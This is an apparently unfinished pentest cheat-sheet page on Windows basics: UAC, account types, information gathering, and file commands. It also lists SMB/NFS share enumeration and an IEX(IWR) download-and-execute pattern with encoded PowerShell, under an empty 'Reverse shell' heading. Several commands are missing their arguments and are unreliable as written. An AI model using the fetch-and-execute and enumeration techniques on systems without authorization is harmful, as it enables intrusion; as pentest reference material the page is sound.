Skip to content

This article is currently being written.

Windows basic

Pentest Tools


Enumerate shares and access :

$ crackmapexec smb --shares
$ smbclient -L


Display shared folders by the NFS server :

$ showmount -e
$ sudo mount -t nfs /mnt/folder

Reverse shell


HTTP Request

C:\> iwr

C:\> Invoke-WebRequest '' -OutFile C:\

Run a PowerShell expression

C:\> IEX( IWR )

C:\> powershell.exe -EncodedCommand <base64>

User Account Control (UAC)

The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Windows Security alerts in Windows 10

Source Wikipedia.

Type of accounts

Account Permissions
Guest Can use portable software and can not change system settings.
Standard Can use portable software and change system settings that don’t affect other users.
Administrator Complete control over the PC.
System Complete control over the PC.
Domain Administrator Complete control over all the PC of the domain.

Information gathering

Networks information

IPv4, DNS Server, Network Mask, Mac Adress, ...

C:\> ipconfig /all

Environment variables

Display all the environment variables :

C:\> set
  • APPDATA : Path to the application data directory.
  • TEMP : Path to the temporary directory.
  • PUBLIC : Path to the public directory (all users have READ & WRITE permission)
  • LOGONSERVER : Authentification server.
  • ...

User & group information

Find information about the current user :

C:\> net user %username%
C:\> net user %username% /domain

Find administration users and groups :

C:\> net localgroup administrators

Manage permissions

Microsoft Management Console (MMC)

You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.

Source Microsoft.

Lauch the MMC panel :

C:\> mmc.exe

Displays all available information about Group Policy :

C:\> gpresult /z

Docs about gpresult.

Registry Editor (regedit)

The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.

Source Wikipedia.

Path for policies in regedit :


Windows firewall

Windows Firewall (officially called Windows Defender Firewall in Windows 10), is a firewall component of Microsoft Windows.

Source Wikipedia.

C:\> netsh advfirewall

Windows commands


C:\> e:
E:\> d:
D:\> cd Documents
  • C: Windows system disk.
  • D: Data storage disk.
  • E: Data storage disk.
  • X: Disk use by Windows PE to start.


The name of a disk is just a label, the letters are totally arbitrary.


List content of a directory.


mkdir create directory.

C:\> mkdir <directory>


del delete file.

C:\> del <filename>


rmdir delete folder.

C:\> rmdir <folder>


Use the argument /S to remove all the files within the folder.


C:\> move <src> <dst>


copy only copies files, but not the folders within.

C:\> copy <src> <dst>


xcopy copies files (including the folders within).

C:\> xcopy <src> <dst>


Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

Back to top